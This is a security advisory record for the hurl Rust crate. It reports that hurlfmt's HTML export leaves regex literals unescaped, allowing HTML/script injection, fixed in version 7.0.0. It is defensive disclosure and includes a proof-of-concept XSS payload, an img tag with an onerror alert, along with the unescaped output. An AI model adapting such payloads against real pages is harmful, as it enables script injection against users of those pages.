GHSA-v33j-v3x4-42qg

Suggest an improvement
Source
https://github.com/advisories/GHSA-v33j-v3x4-42qg
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v33j-v3x4-42qg/GHSA-v33j-v3x4-42qg.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-v33j-v3x4-42qg
Published
2025-06-11T14:46:37Z
Modified
2025-06-11T14:46:37Z
Summary
Regex literal in Hurl files are not escaped when exported to HTML, allowing injections
Details

Given this Hurl file:

regex.hurl:

GET https://foo.com
HTTP 200
[Asserts]
jsonpath "$.body" matches /<img src="" onerror="alert('Hi!')">/

When exported to HTML:

$ hurlfmt --out html regex.hurl
<pre><code class="language-hurl"><span class="hurl-entry"><span class="request"><span class="line"><span class="method">GET</span> <span class="url">https://foo.com</span></span>
</span><span class="response"><span class="line"><span class="version">HTTP</span> <span class="number">200</span></span>
<span class="line"><span class="section-header">[Asserts]</span></span>
<span class="line"><span class="query-type">jsonpath</span> <span class="string">"$.body"</span> <span class="predicate-type">matches</span> <span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
</span></span><span class="line"></span>
</code></pre>

The regex literal /<img src="" onerror="alert('Hi!')">/ is not escaped:

<span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>

When opened in a browser, the code is run without user interaction:

regex

Database specific 
{
    "nvd_published_at": null,
    "cwe_ids": [],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-11T14:46:37Z"
}
References

Affected packages

crates.io / hurl

Package

Name
hurl
View open source insights on deps.dev
Purl
pkg:cargo/hurl

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
7.0.0

Database specific 

{
    "last_known_affected_version_range": "<= 6.1.1"
}